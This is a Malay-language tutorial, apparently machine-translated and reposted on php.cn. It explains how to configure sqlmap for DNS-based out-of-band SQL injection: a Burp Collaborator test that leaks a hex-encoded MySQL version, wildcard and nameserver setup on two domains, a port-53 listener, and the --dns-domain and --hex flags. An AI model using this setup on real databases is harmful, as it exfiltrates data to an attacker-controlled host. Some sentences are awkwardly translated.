Rumah  >  Artikel  >  Operasi dan penyelenggaraan  >  Apakah kaedah konfigurasi suntikan sqlmap _dns?

Apakah kaedah konfigurasi suntikan sqlmap _dns?

WBOY
WBOYke hadapan
2023-05-12 12:25:061362semak imbas

Terdapat terlalu sedikit artikel berkaitan tentang suntikan dns untuk sqlmap di Internet. Mereka hanya memperkenalkan secara ringkas parameter --dns-domain. Kunci belum dibawa oleh bos). Kemudian saya melakukannya sekali lagi dengan merujuk kepada kaedah di Internet.

Perkara yang perlu disediakan ialah satu sqlmap, windows blind injection, dua nama domain dan pelayan rangkaian luaran.

sqlmap _dns注入配置方法是什么

Suatu ketika saya sedang melakukan sesuatu, saya terjumpa suntikan buta masa Ia adalah mesin Windows, dan saya teringat kaedah suntikan dns.

sqlmap _dns注入配置方法是什么

Sebelum bermula, saya bercadang untuk menggunakan perintah --sql-shell sqlmap untuk menguji muatan suntikan dns

sqlmap _dns注入配置方法是什么

Mula-mula pergi ke klien kolaborator dalam burpsuite dan salin nama domain yang diberikan kepada kami oleh burp

Gunakan sqlmap untuk melaksanakan pernyataan sql

sqlmap _dns注入配置方法是什么

Sqlmap masih berjalan Permintaan telah diterima dalam burpsuite.

sqlmap _dns注入配置方法是什么

352E362E3134.9hreqpopru1xgf9skq473yo14sajy8.burpcollaborator.net 352E362E3134 dalam

keputusan dikembalikan selepas .

sqlmap _dns注入配置方法是什么

Nyahkod untuk mendapatkan versi mysql. Nah, tidak salah dengan suntikan dns pada ketika ini.

Bersedia untuk mengkonfigurasi dua nama domain Beberapa artikel di Internet mengatakan bahawa satu adalah baik, tetapi ia sentiasa terasa lebih menyusahkan penyedia pelayan nama domain tidak menyediakan fungsi lanjutan tertentu, jadi lebih mudah untuk menyediakan dua .

www.a.com

www.b.com

Mula-mula kami mengkonfigurasi nama domain a-> a.com

sqlmap _dns注入配置方法是什么

Cuma tambah * untuk melaksanakan resolusi pan dan tuding ke IP pelayan rangkaian luaran kami.

Mari kita konfigurasikan nama domain kami b->b.com

sqlmap _dns注入配置方法是什么

Ini lebih mudah cuma ubah suai dns nama domain secara terus dan isikan ns1 .a.com ns2.a.com sudah memadai. Tidak perlu buat apa-apa lagi, isi sahaja.

Kemudian tunggu sehingga nama domain berkuat kuasa. Kami pergi ke pelayan rangkaian luaran untuk menguji sama ada penghuraian berjaya

sqlmap _dns注入配置方法是什么

Pelayan mula mendengar port 53

sqlmap _dns注入配置方法是什么

Kemudian komputer tempatan ping hello.b.com dan menghantarnya ke pelayan luaran Kami telah dapat menerima permintaan daripada hello.b.com, dan komputer tempatan menggesa bahawa hos tidak ditemui dan tidak. perlu diabaikan kerana kami belum menyediakan parsing. Setelah semuanya dikonfigurasikan, kita boleh menggunakan sqlmap untuk suntikan dns.

sqlmap _dns注入配置方法是什么

Tambah parameter --dns-domain=b.com --hex ke Sqlmap dan anda boleh

sqlmap _dns注入配置方法是什么

Pada langkah ini, sqlmap akan tersekat apabila diminta untuk menyediakan contoh pelayan DNS

dan terus ctrl+c

sqlmap _dns注入配置方法是什么

menggesa bahawa pengambilan data melalui DNS saluran berjaya.

Kelajuan suntikan adalah sepantas pelaporan ralat dan penyatuan, jadi anda tidak perlu menanggung ketinggalan lagi.

Atas ialah kandungan terperinci Apakah kaedah konfigurasi suntikan sqlmap _dns?. Untuk maklumat lanjut, sila ikut artikel berkaitan lain di laman web China PHP!

Kenyataan:
Artikel ini dikembalikan pada:yisu.com. Jika ada pelanggaran, sila hubungi admin@php.cn Padam